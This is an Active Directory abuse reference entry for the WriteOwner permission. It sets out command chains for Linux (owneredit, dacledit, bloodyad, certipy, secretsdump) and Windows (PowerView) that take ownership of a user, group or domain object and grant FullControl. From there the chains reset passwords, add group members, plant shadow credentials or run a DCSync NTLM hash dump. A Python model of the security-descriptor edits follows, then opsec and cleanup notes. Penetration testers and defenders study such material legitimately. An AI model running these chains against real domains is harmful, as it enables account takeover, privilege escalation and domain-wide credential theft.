WriteOwner

Source can change the owner of the target object. As owner, source implicitly holds READ_CONTROL and WRITE_DAC on it and can therefore grant itself any right. Caveat: an explicit ACE for the well-known OWNER RIGHTS SID (S-1-3-4) replaces those implicit owner rights, so on such an object ownership alone does not yield WriteDacl.

Applies to: User/Group/Computer → User, Group, Computer, Domain, GPO


Linux Abuse

Step 1: Change owner to attacker account (unless you hold SeRestorePrivilege, the new owner must be your own account or a group you are a member of)

owneredit.py -action write -new-owner '<username>' \
    -target '<target-user>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

Step 2: Grant self FullControl (now that we own it)

dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-user>,CN=Users,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

Step 3: Exploit (example: reset target user's password)

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set password <target-user> '<new-password>'

Step 3 alt: shadow credentials

certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-user> -dc-ip <dc-ip>

Target: Group (take ownership, then add self)

owneredit.py -action write -new-owner '<username>' -target '<target-group>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

dacledit.py -action write -rights FullControl -principal <username> \
    -target-dn 'CN=<target-group>,CN=Users,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> add groupMember '<target-group>' '<username>'

Target: Domain (take ownership, then DCSync)

owneredit.py -action write -new-owner '<username>' -target-dn 'DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

dacledit.py -action write -rights DCSync -principal <username> \
    -target-dn 'DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

secretsdump.py '<domain>/<username>:<password>@<dc-ip>' -just-dc-ntlm

Windows Abuse

Step 1: Take ownership

Set-DomainObjectOwner -Identity '<target-user>' -OwnerIdentity '<username>' -Credential $cred

Step 2: Grant FullControl

Add-DomainObjectAcl -TargetIdentity '<target-user>' -PrincipalIdentity '<username>' -Rights All -Credential $cred

Step 3: Exploit

# Reset password
Set-DomainUserPassword -Identity <target-user> -AccountPassword (ConvertTo-SecureString '<new-password>' -AsPlainText -Force) -Credential $cred
# Or add to group
Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred
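The Linux and Windows chains above both come down to two writes to the target's nTSecurityDescriptor: step 1 rewrites only the Owner field, and step 2 appends an ACE that the owner is now allowed to add. The following is an added Python example (not code from this page, impacket or PowerView) that performs those two edits on a self-relative security descriptor and runs a simplified access check at each stage, so the jump from "owner" to WRITE_DAC to FullControl is visible in the mask. All SIDs and the descriptor are constructed; the toy only models plain allow/deny ACEs (real AD DACLs also carry object-type ACEs), ignores deny ACEs, and uses its own helper names. It also demonstrates the OWNER RIGHTS (S-1-3-4) caveat: an ACE for that SID replaces the implicit owner rights, which defeats the chain.

```python
"""Toy self-relative security-descriptor editor (constructed example, not impacket code).

Only plain ACCESS_ALLOWED/ACCESS_DENIED ACEs are modelled; object-type ACEs
(0x05..0x08), SACLs and deny evaluation are out of scope."""
import struct

# Standard access-mask bits from MS-DTYP
READ_CONTROL = 0x00020000
WRITE_DAC    = 0x00040000
WRITE_OWNER  = 0x00080000
GENERIC_ALL  = 0x10000000           # dacledit "FullControl" / PowerView "All"
ACCESS_ALLOWED_ACE_TYPE = 0x00
OWNER_RIGHTS_SID = "S-1-3-4"        # well-known OWNER RIGHTS SID
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACL_REVISION_DS = 0x04

def sid_to_bytes(sid):
    p = sid.split("-")                                   # S-rev-authority-sub...
    subs = [int(x) for x in p[3:]]
    return (struct.pack("<BB", int(p[1]), len(subs)) + int(p[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def sid_from_bytes(buf, off):
    rev, n = struct.unpack_from("<BB", buf, off)
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % n, buf, off + 8)
    return "S-%d-%d%s" % (rev, auth, "".join("-%d" % s for s in subs))

def parse_sd(buf):
    """SECURITY_DESCRIPTOR (self-relative): 20-byte header with offsets to owner/group/SACL/DACL."""
    _rev, _sbz, ctrl, o_own, o_grp, _o_sacl, o_dacl = struct.unpack_from("<BBHIIII", buf, 0)
    sd = {"owner": sid_from_bytes(buf, o_own), "group": sid_from_bytes(buf, o_grp), "dacl": []}
    if ctrl & SE_DACL_PRESENT and o_dacl:
        count = struct.unpack_from("<BBHHH", buf, o_dacl)[3]   # ACL header: rev, sbz, size, count, sbz
        off = o_dacl + 8
        for _ in range(count):
            atype, aflags, asize = struct.unpack_from("<BBH", buf, off)
            sd["dacl"].append({"type": atype, "flags": aflags,
                               "mask": struct.unpack_from("<I", buf, off + 4)[0],
                               "sid": sid_from_bytes(buf, off + 8)})
            off += asize
    return sd

def build_sd(sd):
    aces = b""
    for a in sd["dacl"]:
        body = struct.pack("<I", a["mask"]) + sid_to_bytes(a["sid"])
        aces += struct.pack("<BBH", a["type"], a["flags"], 4 + len(body)) + body
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(sd["dacl"]), 0) + aces
    owner, group = sid_to_bytes(sd["owner"]), sid_to_bytes(sd["group"])
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         20, 20 + len(owner), 0, 20 + len(owner) + len(group))
    return header + owner + group + dacl

def take_ownership(buf, new_owner):
    """Step 1 (owneredit -action write / Set-DomainObjectOwner): only the Owner field changes."""
    sd = parse_sd(buf)
    sd["owner"] = new_owner
    return build_sd(sd)

def grant(buf, principal, mask):
    """Step 2 (dacledit -action write / Add-DomainObjectAcl): append an allow ACE (needs WRITE_DAC)."""
    sd = parse_sd(buf)
    sd["dacl"].append({"type": ACCESS_ALLOWED_ACE_TYPE, "flags": 0, "mask": mask, "sid": principal})
    return build_sd(sd)

def effective_rights(buf, principal, groups=()):
    """OR of allow ACEs matching the token, plus the owner's implicit rights (deny ACEs ignored)."""
    sd = parse_sd(buf)
    token = {principal, *groups}
    mask = 0
    for a in sd["dacl"]:
        if a["type"] == ACCESS_ALLOWED_ACE_TYPE and a["sid"] in token:
            mask |= a["mask"]
    if sd["owner"] in token:
        # An OWNER RIGHTS (S-1-3-4) ACE replaces the owner's implicit READ_CONTROL | WRITE_DAC.
        override = [a["mask"] for a in sd["dacl"] if a["sid"] == OWNER_RIGHTS_SID]
        mask |= override[0] if override else (READ_CONTROL | WRITE_DAC)
    return mask

# Constructed sample: Domain Admins own the object; the attacker holds only WriteOwner on it.
DOMAIN_ADMINS = "S-1-5-21-1111-2222-3333-512"
ATTACKER = "S-1-5-21-1111-2222-3333-1105"
VICTIM_SD = build_sd({"owner": DOMAIN_ADMINS, "group": DOMAIN_ADMINS, "dacl": [
    {"type": ACCESS_ALLOWED_ACE_TYPE, "flags": 0, "mask": GENERIC_ALL, "sid": DOMAIN_ADMINS},
    {"type": ACCESS_ALLOWED_ACE_TYPE, "flags": 0, "mask": WRITE_OWNER, "sid": ATTACKER},
]})

def abuse_write_owner(buf, attacker):
    """Run the page's two-step chain; return the attacker's rights before, after step 1, after step 2."""
    before = effective_rights(buf, attacker)
    owned = take_ownership(buf, attacker)               # allowed because before & WRITE_OWNER
    after_owner = effective_rights(owned, attacker)     # now includes implicit WRITE_DAC
    full = grant(owned, attacker, GENERIC_ALL)          # allowed because after_owner & WRITE_DAC
    return before, after_owner, effective_rights(full, attacker)

if __name__ == "__main__":
    for label, m in zip(("before", "after owner change", "after DACL write"),
                        abuse_write_owner(VICTIM_SD, ATTACKER)):
        print("%-20s mask=0x%08x WRITE_DAC=%s GENERIC_ALL=%s"
              % (label, m, bool(m & WRITE_DAC), bool(m & GENERIC_ALL)))
```

Running it prints the three masks: WRITE_OWNER only, then WRITE_OWNER plus the implicit READ_CONTROL and WRITE_DAC, then the same with GENERIC_ALL added. Appending a READ_CONTROL-only ACE for S-1-3-4 to the sample descriptor before the chain leaves the attacker as owner but without WRITE_DAC, which is exactly the defensive use of OWNER RIGHTS.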

Opsec

  • Both steps rewrite the object's nTSecurityDescriptor, so each is logged as a directory-service object modification on the DC (event 5136 with attribute nTSecurityDescriptor when Directory Service Changes auditing is enabled; 4670 may also appear depending on audit policy). The two-step attack (change owner, then grant DACL) therefore leaves at least two entries.
  • Clean up: read and note the original owner before step 1 (owneredit has a read action) and keep the backup dacledit writes before modifying a DACL; after exploitation, remove the added ACE and restore the original owner if persistence is not needed.